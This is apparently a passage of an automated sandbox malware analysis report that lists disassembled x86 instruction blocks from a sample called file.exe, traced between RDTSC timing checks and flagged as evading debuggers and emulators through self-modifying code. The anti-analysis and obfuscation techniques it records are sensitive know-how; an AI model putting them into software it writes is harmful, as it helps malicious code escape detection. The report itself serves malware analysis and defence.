Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5095D second address: 6F50963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50963 second address: 6F509C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov ebx, 76AD7C72h 0x00000013 pop edi 0x00000014 jmp 00007F27A8DB97D8h 0x00000019 popad 0x0000001a mov dword ptr [esp], eax 0x0000001d jmp 00007F27A8DB97D0h 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 jmp 00007F27A8DB97D0h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dx, A200h 0x00000032 push edx 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F509C1 second address: 6F509E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F27A8DEEC2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F509E9 second address: 6F509FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F509FE second address: 6F50A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50A04 second address: 6F50A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50A08 second address: 6F50A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50A5B second address: 6F50A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50A61 second address: 6F50A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50A65 second address: 6F50AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F27A8DB97D2h 0x00000011 and ax, 24F8h 0x00000016 jmp 00007F27A8DB97CBh 0x0000001b popfd 0x0000001c mov ecx, 6B418A2Fh 0x00000021 popad 0x00000022 js 00007F28180A83EFh 0x00000028 jmp 00007F27A8DB97D2h 0x0000002d mov eax, dword ptr [ebp-0Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F27A8DB97CAh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50AC3 second address: 6F50AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50AC9 second address: 6F50ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50ADA second address: 6F50ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50C1A second address: 6F50C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F27A8DB97CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50C48 second address: 6F50C94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edi 0x00000010 pushfd 0x00000011 jmp 00007F27A8DEEC2Fh 0x00000016 and cx, EDEEh 0x0000001b jmp 00007F27A8DEEC39h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50C94 second address: 6F50CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D102h 0x00000007 call 00007F27A8DB97D3h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007F28180A81CDh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov ecx, 6C2D9B2Dh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50CC3 second address: 6F50CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50CC9 second address: 6F50CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50CCD second address: 6F50CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50CE0 second address: 6F50CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50CF2 second address: 6F50D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f mov cl, AAh 0x00000011 mov dx, BF04h 0x00000015 popad 0x00000016 lea eax, dword ptr [ebx+70h] 0x00000019 pushad 0x0000001a jmp 00007F27A8DEEC39h 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 push 00000001h 0x00000025 pushad 0x00000026 mov esi, ebx 0x00000028 call 00007F27A8DEEC35h 0x0000002d mov cx, CAD7h 0x00000031 pop eax 0x00000032 popad 0x00000033 push edx 0x00000034 jmp 00007F27A8DEEC38h 0x00000039 mov dword ptr [esp], eax 0x0000003c pushad 0x0000003d call 00007F27A8DEEC2Eh 0x00000042 mov bh, ah 0x00000044 pop edi 0x00000045 push eax 0x00000046 push edx 0x00000047 movzx ecx, bx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50D82 second address: 6F50DD4 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 5E25C64Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lea eax, dword ptr [ebp-18h] 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 pushfd 0x00000011 jmp 00007F27A8DB97D3h 0x00000016 or cl, FFFFFF9Eh 0x00000019 jmp 00007F27A8DB97D9h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F27A8DB97CDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50DD4 second address: 6F50E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DEEC37h 0x00000009 add eax, 7605945Eh 0x0000000f jmp 00007F27A8DEEC39h 0x00000014 popfd 0x00000015 mov ah, 1Dh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F27A8DEEC39h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50E84 second address: 6F50E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50E8A second address: 6F50E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50E8E second address: 6F50E9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, 668Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50E9F second address: 6F50F15 instructions: 0x00000000 rdtsc 0x00000002 call 00007F27A8DEEC2Fh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, ebx 0x0000000c popad 0x0000000d test edi, edi 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F27A8DEEC37h 0x00000017 sbb ch, FFFFFF9Eh 0x0000001a jmp 00007F27A8DEEC39h 0x0000001f popfd 0x00000020 mov ecx, 586F6067h 0x00000025 popad 0x00000026 mov ebx, esi 0x00000028 popad 0x00000029 js 00007F28180DD3DDh 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F27A8DEEC35h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50F15 second address: 6F50F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50F1B second address: 6F50F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50F1F second address: 6F50FC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F27A8DB97D5h 0x00000012 adc eax, 06377EE6h 0x00000018 jmp 00007F27A8DB97D1h 0x0000001d popfd 0x0000001e jmp 00007F27A8DB97D0h 0x00000023 popad 0x00000024 mov ecx, esi 0x00000026 pushad 0x00000027 movzx esi, di 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F27A8DB97D9h 0x00000031 sub ecx, 667981A6h 0x00000037 jmp 00007F27A8DB97D1h 0x0000003c popfd 0x0000003d mov ax, A8D7h 0x00000041 popad 0x00000042 popad 0x00000043 mov dword ptr [esi+0Ch], eax 0x00000046 jmp 00007F27A8DB97CAh 0x0000004b mov edx, 762C06ECh 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F27A8DB97CAh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50FC9 second address: 6F50FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50FCD second address: 6F50FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F50FD3 second address: 6F51021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DEEC2Ch 0x00000009 jmp 00007F27A8DEEC35h 0x0000000e popfd 0x0000000f call 00007F27A8DEEC30h 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F27A8DEEC2Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51021 second address: 6F51064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007F27A8DB97D3h 0x0000000b adc ch, FFFFFFFEh 0x0000000e jmp 00007F27A8DB97D9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lock cmpxchg dword ptr [edx], ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51064 second address: 6F51068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51068 second address: 6F5106E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5106E second address: 6F51074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51074 second address: 6F51078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51078 second address: 6F510B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F27A8DEEC36h 0x00000010 sbb ah, 00000058h 0x00000013 jmp 00007F27A8DEEC2Bh 0x00000018 popfd 0x00000019 push esi 0x0000001a mov cl, bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e test eax, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F510B5 second address: 6F510CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F510CD second address: 6F510F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007F27A8DEEC2Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F28180DD21Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F27A8DEEC2Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F510F5 second address: 6F510FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F510FC second address: 6F5111D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27A8DEEC35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5111D second address: 6F5112D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5112D second address: 6F51131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51131 second address: 6F511C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a jmp 00007F27A8DB97D7h 0x0000000f mov dword ptr [edx], eax 0x00000011 jmp 00007F27A8DB97D6h 0x00000016 mov eax, dword ptr [esi+04h] 0x00000019 pushad 0x0000001a mov bh, cl 0x0000001c call 00007F27A8DB97D3h 0x00000021 movzx ecx, bx 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov dword ptr [edx+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F27A8DB97CDh 0x00000032 xor eax, 25853236h 0x00000038 jmp 00007F27A8DB97D1h 0x0000003d popfd 0x0000003e jmp 00007F27A8DB97D0h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5129A second address: 6F512A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F512A0 second address: 6F51304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 pushfd 0x00000006 jmp 00007F27A8DB97CFh 0x0000000b or ah, FFFFFFAEh 0x0000000e jmp 00007F27A8DB97D9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a jmp 00007F27A8DB97CEh 0x0000001f mov dword ptr [edx+18h], eax 0x00000022 jmp 00007F27A8DB97D0h 0x00000027 mov eax, dword ptr [esi+1Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov si, dx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51304 second address: 6F51309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51309 second address: 6F5135B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d mov bh, A1h 0x0000000f mov ax, 8491h 0x00000013 popad 0x00000014 mov eax, dword ptr [esi+20h] 0x00000017 jmp 00007F27A8DB97CCh 0x0000001c mov dword ptr [edx+20h], eax 0x0000001f jmp 00007F27A8DB97D0h 0x00000024 mov eax, dword ptr [esi+24h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F27A8DB97D7h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5135B second address: 6F51361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51361 second address: 6F51365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51365 second address: 6F51375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51375 second address: 6F513DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b jmp 00007F27A8DB97CDh 0x00000010 mov dword ptr [edx+28h], eax 0x00000013 pushad 0x00000014 pushad 0x00000015 mov ax, C969h 0x00000019 pushfd 0x0000001a jmp 00007F27A8DB97D6h 0x0000001f and ecx, 7A0E1838h 0x00000025 jmp 00007F27A8DB97CBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov di, cx 0x0000002f popad 0x00000030 mov ecx, dword ptr [esi+2Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F27A8DB97D1h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F513DA second address: 6F514A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DEEC37h 0x00000009 and ecx, 54A8AB5Eh 0x0000000f jmp 00007F27A8DEEC39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F27A8DEEC30h 0x0000001b add si, 1758h 0x00000020 jmp 00007F27A8DEEC2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov dword ptr [edx+2Ch], ecx 0x0000002c pushad 0x0000002d call 00007F27A8DEEC34h 0x00000032 pushfd 0x00000033 jmp 00007F27A8DEEC32h 0x00000038 or eax, 380568E8h 0x0000003e jmp 00007F27A8DEEC2Bh 0x00000043 popfd 0x00000044 pop esi 0x00000045 push ebx 0x00000046 mov edi, esi 0x00000048 pop esi 0x00000049 popad 0x0000004a mov ax, word ptr [esi+30h] 0x0000004e jmp 00007F27A8DEEC37h 0x00000053 mov word ptr [edx+30h], ax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a mov cl, dl 0x0000005c mov edx, ecx 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F514A4 second address: 6F514D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F27A8DB97CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F514D4 second address: 6F51542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e push ecx 0x0000000f mov bh, 28h 0x00000011 pop esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F27A8DEEC2Bh 0x00000019 sbb esi, 643640FEh 0x0000001f jmp 00007F27A8DEEC39h 0x00000024 popfd 0x00000025 mov edx, esi 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [esi+34h] 0x0000002c jmp 00007F27A8DEEC2Ah 0x00000031 mov dword ptr [edx+34h], eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F27A8DEEC2Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F51542 second address: 6F515C8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F27A8DB97D2h 0x00000008 sub al, 00000058h 0x0000000b jmp 00007F27A8DB97CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F27A8DB97D8h 0x00000019 jmp 00007F27A8DB97D5h 0x0000001e popfd 0x0000001f popad 0x00000020 test ecx, 00000700h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F27A8DB97D6h 0x0000002f or ah, 00000048h 0x00000032 jmp 00007F27A8DB97CBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F515C8 second address: 6F515E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DEEC34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F515E0 second address: 6F5161D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F28180A78F5h 0x0000000e jmp 00007F27A8DB97D7h 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F27A8DB97D0h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5161D second address: 6F5162C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5162C second address: 6F516B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov di, 7E26h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000010 jmp 00007F27A8DB97CDh 0x00000015 or dword ptr [edx+40h], FFFFFFFFh 0x00000019 jmp 00007F27A8DB97CEh 0x0000001e pop esi 0x0000001f pushad 0x00000020 mov dl, ch 0x00000022 call 00007F27A8DB97D3h 0x00000027 mov ax, A02Fh 0x0000002b pop esi 0x0000002c popad 0x0000002d pop ebx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007F27A8DB97D7h 0x00000037 or eax, 0F9C9B6Eh 0x0000003d jmp 00007F27A8DB97D9h 0x00000042 popfd 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8046E second address: 6F80474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80474 second address: 6F80490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80490 second address: 6F80494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80494 second address: 6F804A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F804A6 second address: 6F804ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F27A8DEEC31h 0x00000009 jmp 00007F27A8DEEC2Bh 0x0000000e popfd 0x0000000f mov eax, 67F463DFh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F27A8DEEC37h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
